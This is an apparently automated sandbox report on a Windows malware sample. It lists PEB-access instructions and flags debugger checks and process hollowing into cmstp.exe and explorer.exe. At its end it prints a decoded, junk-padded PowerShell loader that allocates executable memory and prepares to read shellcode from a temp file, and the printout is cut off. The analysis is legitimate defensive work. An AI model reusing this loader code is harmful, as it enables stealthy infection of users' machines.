Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED32581 mov eax, dword ptr fs:[00000030h] 18_2_1ED32581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED02D8A mov eax, dword ptr fs:[00000030h] 18_2_1ED02D8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED31DB5 mov eax, dword ptr fs:[00000030h] 18_2_1ED31DB5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD05AC mov eax, dword ptr fs:[00000030h] 18_2_1EDD05AC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED335A1 mov eax, dword ptr fs:[00000030h] 18_2_1ED335A1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED27D50 mov eax, dword ptr fs:[00000030h] 18_2_1ED27D50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED43D43 mov eax, dword ptr fs:[00000030h] 18_2_1ED43D43
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED83540 mov eax, dword ptr fs:[00000030h] 18_2_1ED83540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2C577 mov eax, dword ptr fs:[00000030h] 18_2_1ED2C577
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0AD30 mov eax, dword ptr fs:[00000030h] 18_2_1ED0AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED13D34 mov eax, dword ptr fs:[00000030h] 18_2_1ED13D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDCE539 mov eax, dword ptr fs:[00000030h] 18_2_1EDCE539
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED34D3B mov eax, dword ptr fs:[00000030h] 18_2_1ED34D3B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD8D34 mov eax, dword ptr fs:[00000030h] 18_2_1EDD8D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED8A537 mov eax, dword ptr fs:[00000030h] 18_2_1ED8A537
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED32ACB mov eax, dword ptr fs:[00000030h] 18_2_1ED32ACB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED32AE4 mov eax, dword ptr fs:[00000030h] 18_2_1ED32AE4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3D294 mov eax, dword ptr fs:[00000030h] 18_2_1ED3D294
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1AAB0 mov eax, dword ptr fs:[00000030h] 18_2_1ED1AAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3FAB0 mov eax, dword ptr fs:[00000030h] 18_2_1ED3FAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED052A5 mov eax, dword ptr fs:[00000030h] 18_2_1ED052A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDCEA55 mov eax, dword ptr fs:[00000030h] 18_2_1EDCEA55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED94257 mov eax, dword ptr fs:[00000030h] 18_2_1ED94257
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED09240 mov eax, dword ptr fs:[00000030h] 18_2_1ED09240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED4927A mov eax, dword ptr fs:[00000030h] 18_2_1ED4927A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDBB260 mov eax, dword ptr fs:[00000030h] 18_2_1EDBB260
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD8A62 mov eax, dword ptr fs:[00000030h] 18_2_1EDD8A62
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED05210 mov eax, dword ptr fs:[00000030h] 18_2_1ED05210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED05210 mov ecx, dword ptr fs:[00000030h] 18_2_1ED05210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0AA16 mov eax, dword ptr fs:[00000030h] 18_2_1ED0AA16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDCAA16 mov eax, dword ptr fs:[00000030h] 18_2_1EDCAA16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED23A1C mov eax, dword ptr fs:[00000030h] 18_2_1ED23A1C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED18A0A mov eax, dword ptr fs:[00000030h] 18_2_1ED18A0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED44A2C mov eax, dword ptr fs:[00000030h] 18_2_1ED44A2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED853CA mov eax, dword ptr fs:[00000030h] 18_2_1ED853CA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2DBE9 mov eax, dword ptr fs:[00000030h] 18_2_1ED2DBE9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3B390 mov eax, dword ptr fs:[00000030h] 18_2_1ED3B390
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED32397 mov eax, dword ptr fs:[00000030h] 18_2_1ED32397
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC138A mov eax, dword ptr fs:[00000030h] 18_2_1EDC138A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDBD380 mov ecx, dword ptr fs:[00000030h] 18_2_1EDBD380
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED11B8F mov eax, dword ptr fs:[00000030h] 18_2_1ED11B8F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD5BA5 mov eax, dword ptr fs:[00000030h] 18_2_1EDD5BA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED34BAD mov eax, dword ptr fs:[00000030h] 18_2_1ED34BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD8B58 mov eax, dword ptr fs:[00000030h] 18_2_1EDD8B58
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0F358 mov eax, dword ptr fs:[00000030h] 18_2_1ED0F358
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0DB40 mov eax, dword ptr fs:[00000030h] 18_2_1ED0DB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED33B7A mov eax, dword ptr fs:[00000030h] 18_2_1ED33B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0DB60 mov ecx, dword ptr fs:[00000030h] 18_2_1ED0DB60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC131B mov eax, dword ptr fs:[00000030h] 18_2_1EDC131B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov ecx, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED058EC mov eax, dword ptr fs:[00000030h] 18_2_1ED058EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED09080 mov eax, dword ptr fs:[00000030h] 18_2_1ED09080
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED83884 mov eax, dword ptr fs:[00000030h] 18_2_1ED83884
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3F0BF mov ecx, dword ptr fs:[00000030h] 18_2_1ED3F0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3F0BF mov eax, dword ptr fs:[00000030h] 18_2_1ED3F0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED490AF mov eax, dword ptr fs:[00000030h] 18_2_1ED490AF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED20050 mov eax, dword ptr fs:[00000030h] 18_2_1ED20050
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD1074 mov eax, dword ptr fs:[00000030h] 18_2_1EDD1074
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC2073 mov eax, dword ptr fs:[00000030h] 18_2_1EDC2073
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD4015 mov eax, dword ptr fs:[00000030h] 18_2_1EDD4015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED87016 mov eax, dword ptr fs:[00000030h] 18_2_1ED87016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h] 18_2_1ED1B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h] 18_2_1ED3002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED941E8 mov eax, dword ptr fs:[00000030h] 18_2_1ED941E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B1E1 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED32990 mov eax, dword ptr fs:[00000030h] 18_2_1ED32990
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2C182 mov eax, dword ptr fs:[00000030h] 18_2_1ED2C182
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3A185 mov eax, dword ptr fs:[00000030h] 18_2_1ED3A185
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h] 18_2_1ED851BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED361A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED361A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED869A6 mov eax, dword ptr fs:[00000030h] 18_2_1ED869A6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2B944 mov eax, dword ptr fs:[00000030h] 18_2_1ED2B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B171 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0C962 mov eax, dword ptr fs:[00000030h] 18_2_1ED0C962
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED09100 mov eax, dword ptr fs:[00000030h] 18_2_1ED09100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3513A mov eax, dword ptr fs:[00000030h] 18_2_1ED3513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov ecx, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F746D mov eax, dword ptr fs:[00000030h] 27_2_047F746D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A8CD6 mov eax, dword ptr fs:[00000030h] 27_2_048A8CD6
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048914FB mov eax, dword ptr fs:[00000030h] 27_2_048914FB
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856CF0 mov eax, dword ptr fs:[00000030h] 27_2_04856CF0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A740D mov eax, dword ptr fs:[00000030h] 27_2_048A740D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856C0A mov eax, dword ptr fs:[00000030h] 27_2_04856C0A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480BC2C mov eax, dword ptr fs:[00000030h] 27_2_0480BC2C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480A44B mov eax, dword ptr fs:[00000030h] 27_2_0480A44B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486C450 mov eax, dword ptr fs:[00000030h] 27_2_0486C450
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E849B mov eax, dword ptr fs:[00000030h] 27_2_047E849B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04802581 mov eax, dword ptr fs:[00000030h] 27_2_04802581
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FC577 mov eax, dword ptr fs:[00000030h] 27_2_047FC577
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480FD9B mov eax, dword ptr fs:[00000030h] 27_2_0480FD9B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048035A1 mov eax, dword ptr fs:[00000030h] 27_2_048035A1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A05AC mov eax, dword ptr fs:[00000030h] 27_2_048A05AC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F7D50 mov eax, dword ptr fs:[00000030h] 27_2_047F7D50
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04801DB5 mov eax, dword ptr fs:[00000030h] 27_2_04801DB5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856DC9 mov eax, dword ptr fs:[00000030h] 27_2_04856DC9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856DC9 mov ecx, dword ptr fs:[00000030h] 27_2_04856DC9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DAD30 mov eax, dword ptr fs:[00000030h] 27_2_047DAD30
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489FDE2 mov eax, dword ptr fs:[00000030h] 27_2_0489FDE2
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04888DF1 mov eax, dword ptr fs:[00000030h] 27_2_04888DF1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047ED5E0 mov eax, dword ptr fs:[00000030h] 27_2_047ED5E0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489E539 mov eax, dword ptr fs:[00000030h] 27_2_0489E539
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0485A537 mov eax, dword ptr fs:[00000030h] 27_2_0485A537
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04804D3B mov eax, dword ptr fs:[00000030h] 27_2_04804D3B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A8D34 mov eax, dword ptr fs:[00000030h] 27_2_048A8D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04813D43 mov eax, dword ptr fs:[00000030h] 27_2_04813D43
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04853540 mov eax, dword ptr fs:[00000030h] 27_2_04853540
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04883D40 mov eax, dword ptr fs:[00000030h] 27_2_04883D40
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D2D8A mov eax, dword ptr fs:[00000030h] 27_2_047D2D8A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486FE87 mov eax, dword ptr fs:[00000030h] 27_2_0486FE87
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FAE73 mov eax, dword ptr fs:[00000030h] 27_2_047FAE73
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E766D mov eax, dword ptr fs:[00000030h] 27_2_047E766D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048546A7 mov eax, dword ptr fs:[00000030h] 27_2_048546A7
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A0EA5 mov eax, dword ptr fs:[00000030h] 27_2_048A0EA5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h] 27_2_047E7E41
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04818EC7 mov eax, dword ptr fs:[00000030h] 27_2_04818EC7
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0488FEC0 mov eax, dword ptr fs:[00000030h] 27_2_0488FEC0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048036CC mov eax, dword ptr fs:[00000030h] 27_2_048036CC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A8ED6 mov eax, dword ptr fs:[00000030h] 27_2_048A8ED6
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DE620 mov eax, dword ptr fs:[00000030h] 27_2_047DE620
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048016E0 mov ecx, dword ptr fs:[00000030h] 27_2_048016E0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DC600 mov eax, dword ptr fs:[00000030h] 27_2_047DC600
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04808E00 mov eax, dword ptr fs:[00000030h] 27_2_04808E00
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891608 mov eax, dword ptr fs:[00000030h] 27_2_04891608
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E76E2 mov eax, dword ptr fs:[00000030h] 27_2_047E76E2
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480A61C mov eax, dword ptr fs:[00000030h] 27_2_0480A61C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0488FE3F mov eax, dword ptr fs:[00000030h] 27_2_0488FE3F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489AE44 mov eax, dword ptr fs:[00000030h] 27_2_0489AE44
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04857794 mov eax, dword ptr fs:[00000030h] 27_2_04857794
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047EFF60 mov eax, dword ptr fs:[00000030h] 27_2_047EFF60
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047EEF40 mov eax, dword ptr fs:[00000030h] 27_2_047EEF40
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D4F2E mov eax, dword ptr fs:[00000030h] 27_2_047D4F2E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FF716 mov eax, dword ptr fs:[00000030h] 27_2_047FF716
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048137F5 mov eax, dword ptr fs:[00000030h] 27_2_048137F5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A070D mov eax, dword ptr fs:[00000030h] 27_2_048A070D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480A70E mov eax, dword ptr fs:[00000030h] 27_2_0480A70E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486FF10 mov eax, dword ptr fs:[00000030h] 27_2_0486FF10
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480E730 mov eax, dword ptr fs:[00000030h] 27_2_0480E730
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A8F6A mov eax, dword ptr fs:[00000030h] 27_2_048A8F6A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E8794 mov eax, dword ptr fs:[00000030h] 27_2_047E8794
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04853884 mov eax, dword ptr fs:[00000030h] 27_2_04853884
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h] 27_2_048020A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048190AF mov eax, dword ptr fs:[00000030h] 27_2_048190AF
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F0050 mov eax, dword ptr fs:[00000030h] 27_2_047F0050
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480F0BF mov ecx, dword ptr fs:[00000030h] 27_2_0480F0BF
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480F0BF mov eax, dword ptr fs:[00000030h] 27_2_0480F0BF
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h] 27_2_047FA830
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h] 27_2_047EB02A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h] 27_2_0486B8D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486B8D0 mov ecx, dword ptr fs:[00000030h] 27_2_0486B8D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D58EC mov eax, dword ptr fs:[00000030h] 27_2_047D58EC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04857016 mov eax, dword ptr fs:[00000030h] 27_2_04857016
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D40E1 mov eax, dword ptr fs:[00000030h] 27_2_047D40E1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A4015 mov eax, dword ptr fs:[00000030h] 27_2_048A4015
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480002D mov eax, dword ptr fs:[00000030h] 27_2_0480002D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04892073 mov eax, dword ptr fs:[00000030h] 27_2_04892073
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D9080 mov eax, dword ptr fs:[00000030h] 27_2_047D9080
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A1074 mov eax, dword ptr fs:[00000030h] 27_2_048A1074
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480A185 mov eax, dword ptr fs:[00000030h] 27_2_0480A185
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DB171 mov eax, dword ptr fs:[00000030h] 27_2_047DB171
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04802990 mov eax, dword ptr fs:[00000030h] 27_2_04802990
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DC962 mov eax, dword ptr fs:[00000030h] 27_2_047DC962
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048061A0 mov eax, dword ptr fs:[00000030h] 27_2_048061A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048569A6 mov eax, dword ptr fs:[00000030h] 27_2_048569A6
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h] 27_2_048949A4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FB944 mov eax, dword ptr fs:[00000030h] 27_2_047FB944
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048551BE mov eax, dword ptr fs:[00000030h] 27_2_048551BE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h] 27_2_047F4120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F4120 mov ecx, dword ptr fs:[00000030h] 27_2_047F4120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048641E8 mov eax, dword ptr fs:[00000030h] 27_2_048641E8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D9100 mov eax, dword ptr fs:[00000030h] 27_2_047D9100
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DB1E1 mov eax, dword ptr fs:[00000030h] 27_2_047DB1E1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480513A mov eax, dword ptr fs:[00000030h] 27_2_0480513A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FC182 mov eax, dword ptr fs:[00000030h] 27_2_047FC182
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480D294 mov eax, dword ptr fs:[00000030h] 27_2_0480D294
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480FAB0 mov eax, dword ptr fs:[00000030h] 27_2_0480FAB0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h] 27_2_047D9240
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04802ACB mov eax, dword ptr fs:[00000030h] 27_2_04802ACB
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h] 27_2_047FA229
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED496E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_1ED496E0

HIPS / PFW / Operating System Protection Evasion:

Sample uses process hollowing technique
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: EB0000
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: unknown protection: read write
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded (the same decoded script for both powershell.exe launches, laid out with the line breaks the encoded command contains; the junk "#..." comment lines and Test-Path no-ops are the loader's own padding, and the text ends where the report truncates it) Jump to behavior
#Rven PAPAP sawbellyun Ricardt5 OKSBONNETL SCIE chinantas Nons Osamine Battalia2 Hovedp4 professi nanakol ensilerekl
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class bidrags1
{
[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int bidrags6,ref Int32 Auxamylase,int Fejem,ref Int32 bidrags,int HOCKEYKAMP,int bidrags7);
[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Semiglut7,uint ATTESTE,int Etiket9,int bidrags0,int bellev,int Buldrr,int FOLKE);
[DllImport("kernel32.dll")]public static extern int ReadFile(int Fejem0,uint Fejem1,IntPtr Fejem2,ref Int32 Fejem3,int Fejem4);
[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Fejem5,int Fejem6,int Fejem7,int Fejem8,int Fejem9);
}
"@
#Berigning balust Fjert Splintri7 Melanists VICEUDENRI nettovrd MAGSVEJRCL Mirkosu Cockfighta coppere OPELSK BJRNEUN Hagedesm7 farr
Test-Path "objekt"
Test-Path "FOLKE"
$bidrags3=0;
$bidrags9=1048576;
$bidrags8=[bidrags1]::NtAllocateVirtualMemory(-1,[ref]$bidrags3,0,[ref]$bidrags9,12288,64)
#Socialdem7 SCALD Boggles sikh Oliske Sjuskemal6 investm Elit9 MULTIFACTO Frugal Brnepsy Express Frde CORRODER FRONT fittilyske Epipl Purvey mundsk Stude4 selska komp kbesumsan Autotomicf TRAI lancew Trans Biorytme
Test-Path "Baneberrie2"
$bidrags2="$env:temp" + "\FORSVARL.dat"
#BRATSCHER Prst Formulere3 Nasopharyn Montg CONTRALT NONCAPIL Victorian3 BRNDEVI
